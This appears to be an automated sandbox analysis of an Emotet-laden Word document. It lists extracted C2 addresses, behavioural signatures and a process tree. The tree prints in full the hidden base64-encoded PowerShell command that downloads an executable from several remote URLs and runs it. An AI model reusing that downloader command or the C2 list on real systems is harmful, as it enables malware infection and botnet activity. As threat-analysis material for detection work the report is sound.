Analysis
-
max time kernel
28s -
max time network
25s -
resource
win10v191014
General
-
Target
2c1d3996b5dcf03297c1ec77face21d06d9596e446c5910067274e1addb2a108
-
Sample
191217-gxtn18tjge
-
SHA256
2c1d3996b5dcf03297c1ec77face21d06d9596e446c5910067274e1addb2a108
Score
N/A
Malware Config
Extracted
Family
emotet
C2
190.38.252.45:443
105.225.77.21:80
181.167.35.84:80
164.68.115.146:8080
5.189.148.98:8080
46.105.128.215:8080
69.30.205.162:7080
190.161.67.63:80
81.82.247.216:80
72.69.99.47:80
172.90.70.168:443
91.117.31.181:80
200.71.112.158:53
51.77.113.97:8080
190.101.87.170:80
96.234.38.186:8080
190.146.14.143:443
86.70.224.211:80
88.247.26.78:80
175.103.239.50:80
187.233.220.93:443
85.235.219.74:80
87.9.181.247:80
162.144.46.90:8080
58.185.224.18:80
37.59.24.25:8080
138.197.140.163:8080
124.150.175.129:8080
82.79.244.92:80
91.117.131.122:80
185.244.167.25:443
77.245.12.212:80
220.78.29.88:80
95.255.140.89:443
124.150.175.133:80
95.216.207.86:7080
113.52.135.33:7080
177.103.240.93:80
201.196.15.79:990
192.161.190.171:8080
153.190.41.185:80
217.181.139.237:443
110.142.161.90:80
95.9.217.200:8080
189.61.200.9:443
176.58.93.123:80
128.92.54.20:80
195.250.143.182:80
181.46.176.38:80
181.47.235.26:993
192.210.217.94:8080
210.224.65.117:80
139.59.12.63:8080
203.153.216.178:7080
98.15.140.226:80
41.77.74.214:443
50.116.78.109:8080
58.93.151.148:80
78.187.204.70:80
165.100.148.200:443
210.111.160.220:80
59.158.164.66:443
163.172.97.112:8080
119.57.36.54:8080
72.27.212.209:8080
86.98.157.3:80
211.218.105.101:80
72.51.153.27:80
51.38.134.203:8080
123.142.37.165:80
212.129.14.27:8080
37.46.129.215:8080
119.159.150.176:443
95.216.212.157:8080
115.179.91.58:80
191.100.24.201:50000
190.171.135.235:80
24.28.178.71:80
200.41.121.69:443
177.103.201.23:80
174.57.150.13:8080
172.104.70.207:8080
92.16.222.156:80
86.6.123.109:80
110.2.118.164:80
82.146.55.23:7080
178.134.1.238:80
182.176.116.139:995
46.105.131.68:8080
67.254.196.78:443
67.171.182.231:80
175.127.140.68:80
216.75.37.196:8080
37.70.131.107:80
24.27.122.202:80
188.230.134.205:80
201.183.251.100:80
212.112.113.235:80
120.51.83.89:443
193.33.38.208:443
108.184.9.44:80
187.250.92.82:80
83.156.88.159:80
85.109.190.235:443
46.17.6.116:8080
78.46.87.133:8080
89.215.225.15:80
190.5.162.204:80
221.154.59.110:80
189.225.211.171:443
186.84.173.136:8080
78.186.102.195:80
192.241.220.183:8080
158.69.167.246:8080
23.253.207.142:8080
142.93.87.198:8080
100.38.11.243:80
42.51.192.231:8080
rsa_pubkey.plain
Signatures
-
Executes dropped EXE 2 IoCs
Processes:
356.exe356.exepid process 4516 356.exe 4584 356.exe -
Processes:
WINWORD.EXEdescription ioc pid process File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Templates\Normal.dotm 4800 WINWORD.EXE File created C:\Users\Admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm 4800 WINWORD.EXE File opened for modification C:\Users\Admin\AppData\Local\Temp\2c1d3996b5dcf03297c1ec77face21d06d9596e446c5910067274e1addb2a108.doc 4800 WINWORD.EXE File created C:\Users\Admin\AppData\Local\Temp\~$1d3996b5dcf03297c1ec77face21d06d9596e446c5910067274e1addb2a108.doc 4800 WINWORD.EXE -
Checks system information in the registry (likely anti-VM) 2 TTPs 2 IoCs
Processes:
WINWORD.EXEdescription ioc pid process Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemManufacturer 4800 WINWORD.EXE Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemProductName 4800 WINWORD.EXE -
Suspicious use of WriteProcessMemory 3 IoCs
Processes:
SppExtComObj.exePowershell.exe356.exedescription pid process target process PID 2032 wrote to memory of 4176 2032 SppExtComObj.exe SLUI.exe PID 4056 wrote to memory of 4516 4056 Powershell.exe 356.exe PID 4516 wrote to memory of 4584 4516 356.exe 356.exe -
Enumerates system info in registry 2 TTPs 5 IoCs
Processes:
WINWORD.EXEdescription ioc pid process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 4800 WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz 4800 WINWORD.EXE Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS 4800 WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily 4800 WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU 4800 WINWORD.EXE -
Suspicious behavior: EnumeratesProcesses 1 IoCs
Processes:
Powershell.exepid process 4056 Powershell.exe -
Suspicious behavior: EmotetMutantsSpam 1 IoCs
Processes:
356.exepid process 4584 356.exe -
Suspicious use of FindShellTrayWindow 1 IoCs
Processes:
WINWORD.EXEpid process 4800 WINWORD.EXE -
Processes:
356.exedescription ioc pid process Event created Global\E226880C9 4584 356.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
Powershell.exedescription pid process Token: SeDebugPrivilege 4056 Powershell.exe -
Processes:
Powershell.exedescription ioc pid process Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\2B8F1B57330DBBA2D07A6C51F70EE90DDAB9AD8E\Blob = 0f000000010000003000000066b764a96581128168cf208e374dda479d54e311f32457f4aee0dbd2a6c8d171d531289e1cd22bfdbbd4cfd979625483090000000100000054000000305206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b06010505070308060a2b0601040182370a030406082b0601050507030606082b0601050507030753000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0620000000100000020000000e793c9b02fd8aa13e21c31228accb08119643b749c898964b1746d46c3d4cbd21400000001000000140000005379bf5aaa2b4acf5480e1d89bc09df2b20366cb1d0000000100000010000000885010358d29a38f059b028559c95f900b00000001000000100000005300650063007400690067006f0000000300000001000000140000002b8f1b57330dbba2d07a6c51f70ee90ddab9ad8e2000000001000000e2050000308205de308203c6a003020102021001fd6d30fca3ca51a81bbc640e35032d300d06092a864886f70d01010c0500308188310b3009060355040613025553311330110603550408130a4e6577204a6572736579311430120603550407130b4a65727365792043697479311e301c060355040a131554686520555345525452555354204e6574776f726b312e302c06035504031325555345525472757374205253412043657274696669636174696f6e20417574686f72697479301e170d3130303230313030303030305a170d3338303131383233353935395a308188310b3009060355040613025553311330110603550408130a4e6577204a6572736579311430120603550407130b4a65727365792043697479311e301c060355040a131554686520555345525452555354204e6574776f726b312e302c06035504031325555345525472757374205253412043657274696669636174696f6e20417574686f7269747930820222300d06092a864886f70d01010105000382020f003082020a028202010080126517360ec3db08b3d0ac570d76edcd27d34cad508361e2aa204d092d6409dcce899fcc3da9ecf6cfc1dcf1d3b1d67b3728112b47da39c6bc3a19b45fa6bd7d9da36342b676f2a93b2b91f8e26fd0ec162090093ee2e874c918b491d46264db7fa306f188186a90223cbcfe13f087147bf6e41f8ed4e451c61167460851cb8614543fbc33fe7e6c9cff169d18bd518e35a6a766c87267db2166b1d49b7803c0503ae8ccf0dcbc9e4cfeaf0596351f575ab7ffcef93db72cb6f654ddc8e7123a4dae4c8ab75c9ab4b7203dca7f2234ae7e3b68660144e7014e46539b3360f794be5337907343f332c353efdbaafe744e69c76b8c6093dec4c70cdfe132aecc933b517895678bee3d56fe0cd0690f1b0ff325266b336df76e47fa7343e57e0ea566b1297c3284635589c40dc19354301913acd37d37a7eb5d3a6c355cdb41d712daa9490bdfd8808a0993628eb566cf2588cd84b8b13fa4390fd9029eeb124c957cf36b05a95e1683ccb867e2e8139dcc5b82d34cb3ed5bffdee573ac233b2d00bf3555740949d849581a7f9236e651920ef3267d1c4d17bcc9ec4326d0bf415f40a94444f499e757879e501f5754a83efd74632fb1506509e658422e431a4cb4f0254759fa041e93d426464a5081b2debe78b7fc6715e1c957841e0f63d6e962bad65f552eea5cc62808042539b80e2ba9f24c971c073f0d52f5edef2f820f0203010001a3423040301d0603551d0e041604145379bf5aaa2b4acf5480e1d89bc09df2b20366cb300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff300d06092a864886f70d01010c050003820201005cd47c0dcff7017d4199650c73c5529fcbf8cf99067f1bda43159f9e0255579614f1523c27879428ed1f3a0137a276fc5350c0849bc66b4eba8c214fa28e556291f36915d8bc88e3c4aa0bfdefa8e94b552a06206d55782919ee5f305c4b241155ff249a6e5e2a2bee0b4d9f7ff70138941495430709fb60a9ee1cab128ca09a5ea7986a596d8b3f08fbc8d145af18156490120f73282ec5e2244efc58ecf0f445fe22b3eb2f8ed2d9456105c1976fa876728f8b8c36afbf0d05ce718de6a66f1f6ca67162c5d8d083720cf16711890c9c134c7234dfbcd571dfaa71dde1b96c8c3c125d65dabd5712b6436bffe5de4d661151cf99aeec17b6e871918cde49fedd3571a21527941ccf61e326bb6fa36725215de6dd1d0b2e681b3b82afec836785d4985174b1b9998089ff7f78195c794a602e9240ae4c372a2cc9c762c80e5df7365bcae0252501b4dd1a079c77003fd0dcd5ec3dd4fabb3fcc85d66f7fa92ddfb902f7f5979ab535dac367b0874aa9289e238eff5c276be1b04ff307ee002ed45987cb524195eaf447d7ee6441557c8d590295dd629dc2b9ee5a287484a59bb790c70c07dff589367432d628c1b0b00be09c4cc31cd6fce369b54746812fa282abd3634470c48dff2d33baad8f7bb57088ae3e19cf4028d8fcc890bb5d9922f552e658c51f883143ee881dd7c68e3c436a1da718de7d3d16f162f9ca90a8fd 4056 Powershell.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\2B8F1B57330DBBA2D07A6C51F70EE90DDAB9AD8E\Blob = 190000000100000010000000ea6089055218053dd01e37e1d806eedf0300000001000000140000002b8f1b57330dbba2d07a6c51f70ee90ddab9ad8e0b00000001000000100000005300650063007400690067006f0000001d0000000100000010000000885010358d29a38f059b028559c95f901400000001000000140000005379bf5aaa2b4acf5480e1d89bc09df2b20366cb620000000100000020000000e793c9b02fd8aa13e21c31228accb08119643b749c898964b1746d46c3d4cbd253000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0090000000100000054000000305206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b06010505070308060a2b0601040182370a030406082b0601050507030606082b060105050703070f000000010000003000000066b764a96581128168cf208e374dda479d54e311f32457f4aee0dbd2a6c8d171d531289e1cd22bfdbbd4cfd9796254832000000001000000e2050000308205de308203c6a003020102021001fd6d30fca3ca51a81bbc640e35032d300d06092a864886f70d01010c0500308188310b3009060355040613025553311330110603550408130a4e6577204a6572736579311430120603550407130b4a65727365792043697479311e301c060355040a131554686520555345525452555354204e6574776f726b312e302c06035504031325555345525472757374205253412043657274696669636174696f6e20417574686f72697479301e170d3130303230313030303030305a170d3338303131383233353935395a308188310b3009060355040613025553311330110603550408130a4e6577204a6572736579311430120603550407130b4a65727365792043697479311e301c060355040a131554686520555345525452555354204e6574776f726b312e302c06035504031325555345525472757374205253412043657274696669636174696f6e20417574686f7269747930820222300d06092a864886f70d01010105000382020f003082020a028202010080126517360ec3db08b3d0ac570d76edcd27d34cad508361e2aa204d092d6409dcce899fcc3da9ecf6cfc1dcf1d3b1d67b3728112b47da39c6bc3a19b45fa6bd7d9da36342b676f2a93b2b91f8e26fd0ec162090093ee2e874c918b491d46264db7fa306f188186a90223cbcfe13f087147bf6e41f8ed4e451c61167460851cb8614543fbc33fe7e6c9cff169d18bd518e35a6a766c87267db2166b1d49b7803c0503ae8ccf0dcbc9e4cfeaf0596351f575ab7ffcef93db72cb6f654ddc8e7123a4dae4c8ab75c9ab4b7203dca7f2234ae7e3b68660144e7014e46539b3360f794be5337907343f332c353efdbaafe744e69c76b8c6093dec4c70cdfe132aecc933b517895678bee3d56fe0cd0690f1b0ff325266b336df76e47fa7343e57e0ea566b1297c3284635589c40dc19354301913acd37d37a7eb5d3a6c355cdb41d712daa9490bdfd8808a0993628eb566cf2588cd84b8b13fa4390fd9029eeb124c957cf36b05a95e1683ccb867e2e8139dcc5b82d34cb3ed5bffdee573ac233b2d00bf3555740949d849581a7f9236e651920ef3267d1c4d17bcc9ec4326d0bf415f40a94444f499e757879e501f5754a83efd74632fb1506509e658422e431a4cb4f0254759fa041e93d426464a5081b2debe78b7fc6715e1c957841e0f63d6e962bad65f552eea5cc62808042539b80e2ba9f24c971c073f0d52f5edef2f820f0203010001a3423040301d0603551d0e041604145379bf5aaa2b4acf5480e1d89bc09df2b20366cb300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff300d06092a864886f70d01010c050003820201005cd47c0dcff7017d4199650c73c5529fcbf8cf99067f1bda43159f9e0255579614f1523c27879428ed1f3a0137a276fc5350c0849bc66b4eba8c214fa28e556291f36915d8bc88e3c4aa0bfdefa8e94b552a06206d55782919ee5f305c4b241155ff249a6e5e2a2bee0b4d9f7ff70138941495430709fb60a9ee1cab128ca09a5ea7986a596d8b3f08fbc8d145af18156490120f73282ec5e2244efc58ecf0f445fe22b3eb2f8ed2d9456105c1976fa876728f8b8c36afbf0d05ce718de6a66f1f6ca67162c5d8d083720cf16711890c9c134c7234dfbcd571dfaa71dde1b96c8c3c125d65dabd5712b6436bffe5de4d661151cf99aeec17b6e871918cde49fedd3571a21527941ccf61e326bb6fa36725215de6dd1d0b2e681b3b82afec836785d4985174b1b9998089ff7f78195c794a602e9240ae4c372a2cc9c762c80e5df7365bcae0252501b4dd1a079c77003fd0dcd5ec3dd4fabb3fcc85d66f7fa92ddfb902f7f5979ab535dac367b0874aa9289e238eff5c276be1b04ff307ee002ed45987cb524195eaf447d7ee6441557c8d590295dd629dc2b9ee5a287484a59bb790c70c07dff589367432d628c1b0b00be09c4cc31cd6fce369b54746812fa282abd3634470c48dff2d33baad8f7bb57088ae3e19cf4028d8fcc890bb5d9922f552e658c51f883143ee881dd7c68e3c436a1da718de7d3d16f162f9ca90a8fd 4056 Powershell.exe -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
Processes:
WINWORD.EXEpid process 4800 WINWORD.EXE -
Suspicious use of SetWindowsHookEx 3 IoCs
Processes:
WINWORD.EXE356.exe356.exepid process 4800 WINWORD.EXE 4516 356.exe 4584 356.exe -
Checks processor information in registry (likely anti-VM) 2 TTPs 2 IoCs
Processes:
WINWORD.EXEdescription ioc pid process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 4800 WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz 4800 WINWORD.EXE
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\2c1d3996b5dcf03297c1ec77face21d06d9596e446c5910067274e1addb2a108.doc" /o ""1⤵
- Drops Office document
- Checks system information in the registry (likely anti-VM)
- Enumerates system info in registry
- Suspicious use of FindShellTrayWindow
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Checks processor information in registry (likely anti-VM)
PID:4800
-
C:\Windows\system32\SppExtComObj.exeC:\Windows\system32\SppExtComObj.exe -Embedding1⤵
- Suspicious use of WriteProcessMemory
PID:2032
-
C:\Windows\System32\SLUI.exe"C:\Windows\System32\SLUI.exe" RuleId=eeba1977-569e-4571-b639-7623d8bfecc0;Action=AutoActivate;AppId=55c92734-d682-4d71-983e-d6ec3f16059f;SkuId=2de67392-b7a7-462a-b1ca-108dd189f588;NotificationInterval=1440;Trigger=TimerEvent1⤵PID:4176
-
C:\Windows\System32\WindowsPowerShell\v1.0\Powershell.exePowershell -w hidden -en JABUAGsAZwBjAHIAaQByAHkAeABpAG8APQAnAEgAegBsAHcAZwBnAGQAawB4AG4AbABoACcAOwAkAEsAeQBxAGMAZABuAGIAdwByACAAPQAgACcAMwA1ADYAJwA7ACQASgBuAHcAZABxAHgAeABpAGMAcAB1AHQAPQAnAEMAdwB2AGsAdQB2AGUAYgAnADsAJABOAHIAdABqAHMAbQBiAHgAeQA9ACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAKwAnAFwAJwArACQASwB5AHEAYwBkAG4AYgB3AHIAKwAnAC4AZQB4AGUAJwA7ACQATABsAGYAdwB4AHYAdQBpAG0AdwBvAD0AJwBMAHgAeABqAHIAagBoAGwAbgB5ACcAOwAkAE8AeQBxAHkAcQBlAGMAaQByAGcAcQA9AC4AKAAnAG4AZQB3ACcAKwAnAC0AbwBiACcAKwAnAGoAZQBjAHQAJwApACAATgBlAHQALgB3AEUAYgBjAEwASQBlAG4AVAA7ACQAQwBqAHUAaQB6AHMAdgBvAHMAaAA9ACcAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AaQBuAGQAaQBhAG4ALQBlAHMAYwBvAHIAdABzAC0AcQBhAHQAYQByAC4AYwBvAG0ALwBqAGoAMAByAHAAegBsAC8AMwBnADkAZABxADgAbAB2AHAAawAtAG8AMgBqAHoAdABpAHoAaABwADAALQA2ADkAMQA5ADUANgA2ADUAMQAwAC8AKgBoAHQAdABwAHMAOgAvAC8AdwB3AHcALgBzAG8AZgBpAHkAYQBjAGwAdQBiAC4AYwBvAG0ALwB3AHAALQBjAG8AbgB0AGUAbgB0AC8AZgB5AGQAaQAxAGEAbgB2AG0AYwAtAHcAZABpAHgAZQB1AHUANgB2ADUALQAwADEAMwAxADQAMQAwADMAMAAvACoAaAB0AHQAcAA6AC8ALwB3AHcAdwAuAHMAaQB5AGkAbgBqAGkAYwBoAGEAbgBnAGoAaQBhAC4AYwBvAG0ALwB3AHAALQBjAG8AbgB0AGUAbgB0AC8ARABjAHoAVQBqAEYAVgBlAC8AKgBoAHQAdABwADoALwAvAHQAegBwAHQAeQB6AC4AYwBvAG0ALwB3AHAALQBhAGQAbQBpAG4ALwA4AHAAcAA3ADQAbgBzAGgALQA3AHQAMAAxADcAbQB5ADUALQAyADkAMQA2ADIALwAqAGgAdAB0AHAAcwA6AC8ALwBrAGEAbQBhAGwAYwBhAGsAZQAuAGMAbwBtAC8AdwBwAC0AaQBuAGMAbAB1AGQAZQBzAC8AZQBoAGYAWgBWAGkAWQBoAC8AJwAuACIAUwBQAGwAYABpAFQAIgAoACcAKgAnACkAOwAkAFEAcQB4AG8AegBxAGkAagBnAHMAZQBzAD0AJwBIAHYAbQBnAGkAbQBzAGsAawBtACcAOwBmAG8AcgBlAGEAYwBoACgAJABXAHQAdgBnAHoAeQB6AHgAbwB0ACAAaQBuACAAJABDAGoAdQBpAHoAcwB2AG8AcwBoACkAewB0AHIAeQB7ACQATwB5AHEAeQBxAGUAYwBpAHIAZwBxAC4AIgBkAGAAbwB3AGAATgBsAG8AQQBkAEYAYABJAEwARQAiACgAJABXAHQAdgBnAHoAeQB6AHgAbwB0ACwAIAAkAE4AcgB0AGoAcwBtAGIAeAB5ACkAOwAkAE0AcwB3AGUAeQBuAHYAYgBnAGYAPQAnAE4AZgBmAGEAZwBzAHMAZQBpAGcAYwBsACcAOwBJAGYAIAAoACgAJgAoACcARwBlAHQALQBJAHQAZQAnACsAJwBtACcAKQAgACQATgByAHQAagBzAG0AYgB4AHkAKQAuACIAbABlAE4AYABnAGAAVABIACIAIAAtAGcAZQAgADMAOQA2ADEAOAApACAAewBbAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAXQA6ADoAIgBTAHQAQQBgAFIAVAAiACgAJABOAHIAdABqAHMAbQBiAHgAeQApADsAJABYAGQAZwBmAGsAcgBvAGQAcQBtAGIAPQAnAFgAYQBlAGMAeQByAHQAZABnAHIAZQAnADsAYgByAGUAYQBrADsAJABTAGQAZwBwAGsAZgByAHkAeAB5AHoAegA9ACcAWQBiAHAAbwBlAHkAYwBoACcAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAEEAbgBoAG4AbQBxAGwAYwA9ACcAWgBrAHgAYQBiAHcAYwBzAHoAYgBlACcA1⤵
- Suspicious use of WriteProcessMemory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Modifies system certificate store
PID:4056
-
C:\Users\Admin\356.exe"C:\Users\Admin\356.exe"1⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
- Suspicious use of SetWindowsHookEx
PID:4516
-
C:\Users\Admin\356.exe--a14f3b521⤵
- Executes dropped EXE
- Suspicious behavior: EmotetMutantsSpam
- Emotet Sync
- Suspicious use of SetWindowsHookEx
PID:4584
Network
MITRE ATT&CK Enterprise v15
MITRE ATT&CK Additional techniques
- T1130